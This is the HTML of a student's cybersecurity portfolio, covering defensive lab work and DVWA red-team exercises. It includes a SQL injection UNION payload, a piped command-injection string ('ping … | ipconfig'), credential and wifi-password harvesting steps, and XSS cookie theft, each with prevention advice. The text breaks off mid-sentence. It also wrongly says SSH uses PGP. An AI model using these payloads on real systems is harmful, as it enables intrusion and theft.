          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
           <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#ddadb4b09dbfb8b8b6b0bcb3aef3b9b8ab"><span class="__cf_email__" data-cfemail="1a6a73775a787f7f71777b7469347e7f6c">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
           <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
           <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
           <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
           <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
          any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
